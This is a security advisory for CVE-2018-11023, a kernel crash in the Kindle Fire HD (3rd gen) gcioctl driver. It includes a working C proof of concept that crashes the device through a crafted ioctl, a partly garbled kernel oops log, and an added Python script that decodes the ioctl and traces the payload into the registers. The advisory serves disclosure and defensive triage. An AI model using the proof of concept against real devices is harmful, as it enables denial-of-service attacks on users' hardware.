(CVE-2018-11023) Amazon Kindle Fire HD (3rd) Fire OS kernel component security vulnerability

1. Vulnerability summary

The kernel module omap/drivers/misc/gcx/gcioctl/gcif.c in the kernel component of the Amazon Kindle Fire HD (3rd) running Fire OS 4.5.5.3 lets an attacker inject a crafted argument through the argument of an ioctl on the device file /dev/gcioctl, using command 3222560159, and cause a kernel crash.

2. Affected versions

Fire OS 4.5.5.3

3. Reproduction

PoC:

/* This is a PoC for the Kindle Fire HD (3rd).
 * A bug in the ioctl interface of the device file /dev/gcioctl crashes the system via IOCTL 3222560159.
 * This PoC must run with permission to do ioctl on /dev/gcioctl.
 */
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>

const static char *driver = "/dev/gcioctl";
static unsigned int command = 3222560159;   /* 0xC0145D9F */

int main(int argc, char **argv, char **envp)
{
    /* Four-word argument block handed to the driver. */
    unsigned int payload[] = { 0x244085aa, 0x1a03e6ef, 0x000003f4, 0x00000000 };
    int fd = 0;

    fd = open(driver, O_RDONLY);
    if (fd < 0) {
        perror(driver);
        return -1;
    }
    printf("Try open %s with command 0x%x.\n", driver, command);
    printf("System will crash and reboot.\n");
    if (ioctl(fd, command, payload) < 0) {
        perror("ioctl");
        close(fd);
        return -1;
    }
    close(fd);
    return 0;
}

Crash log:

[79.825592] init: untracked pid 3232 exited
[79.830841] init: untracked pid 3234 exited
[95.970855] Alignment trap: not handling instruction e1953f9f at f
[95.978912] Unhandled fault: alignment exception (0001) at 0x1a03e6
[95.986053] Internal error: : 1 [#1] PREEMPT SMP ARM
[95.991638] Modules linked in: omaplfb(O) pvrsrvkm(O) pvr_logger(O)
[95.999145] CPU: 0    Tainted: G           O  (3.4.83-gd2afc0bae69 #1)
[96.006408] PC is at _raw_spin_lock_irqsave+0x38/0xb0
[96.012115] LR is at _raw_spin_lock_irqsave+0x10/0x14
[96.017791] pc :    lr :    psr: 20000093
[96.017822] sp : d02bfdd8  ip : d02bfdf8  fp : d02bfdf4
[96.030578] r10: 00000000  r9 : dd3eeca8  r8 : 00000001
[96.036376] r7 : 1a03e6ef  r6 : 00000001  r5 : 1a03e6f3  r4 : d02be000
[96.043701] r3 : 00000001  r2 : 00000001  r1 : 00000082  r0 : 200000
[96.050933] Flags: nzCv  IRQs off  FIQs on  Mode SVC_32  ISA ARM  Segment user
[96.058990] Control: 10c5387d  Table: 96cb804a  DAC: 00000015
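Added triage example (not part of the original advisory or its PoC): it decodes the ioctl number into its _IOC fields using the asm-generic ioctl layout that ARM shares, then checks which oops registers hold the PoC's argument words, which is how a defender confirms that the kernel dereferenced a pointer taken straight from user input. The register lines are a constructed excerpt of the crash log above with the OCR errors corrected; the trapped instruction e1953f9f decodes as ldrex r3, [r5], so r5 is the address the spin lock was taken on.

```python
import re

# Values quoted in the advisory and PoC above.
COMMAND = 3222560159                                   # 0xC0145D9F
PAYLOAD = [0x244085aa, 0x1a03e6ef, 0x000003f4, 0x00000000]

# Constructed excerpt of the oops register lines from the crash log above
# (OCR-corrected, timestamps dropped).
OOPS = """\
PC is at _raw_spin_lock_irqsave+0x38/0xb0
r10: 00000000  r9 : dd3eeca8  r8 : 00000001
r7 : 1a03e6ef  r6 : 00000001  r5 : 1a03e6f3  r4 : d02be000
r3 : 00000001  r2 : 00000001  r1 : 00000082
"""

def decode_ioctl(cmd):
    """Split an ioctl number into its _IOC fields (asm-generic layout, which ARM uses)."""
    dirs = {0: "NONE", 1: "WRITE", 2: "READ", 3: "READ|WRITE"}
    return {
        "nr": cmd & 0xff,
        "type": (cmd >> 8) & 0xff,
        "size": (cmd >> 16) & 0x3fff,
        "dir": dirs[(cmd >> 30) & 0x3],
    }

REG_RE = re.compile(r"\b(r\d{1,2}|sp|lr|pc)\s*:\s*([0-9a-f]{8})\b")

def registers(oops):
    """Map register name -> value for every 'rN : xxxxxxxx' field in the dump."""
    return {m.group(1): int(m.group(2), 16) for m in REG_RE.finditer(oops)}

def payload_in_registers(oops, payload, window=16):
    """Find registers whose value equals a payload word or lies within `window`
    bytes above it, and note whether that value is 4-byte aligned (ldrex on a
    spinlock needs word alignment, which is what the alignment trap reports)."""
    hits = {}
    for reg, val in registers(oops).items():
        for i, word in enumerate(payload):
            if word and word <= val < word + window:
                hits[reg] = {"word": i, "offset": val - word, "aligned": val % 4 == 0}
    return hits

if __name__ == "__main__":
    print("ioctl fields:", decode_ioctl(COMMAND))
    for reg, info in sorted(payload_in_registers(OOPS, PAYLOAD).items()):
        print(f"{reg}: payload[{info['word']}] + {info['offset']}  aligned={info['aligned']}")
```

Decoded, the command is a read/write ioctl with a 20-byte argument block, and the only tainted registers are r7 (payload[1]) and r5 (payload[1] + 4), neither word-aligned, which matches the alignment exception raised inside _raw_spin_lock_irqsave.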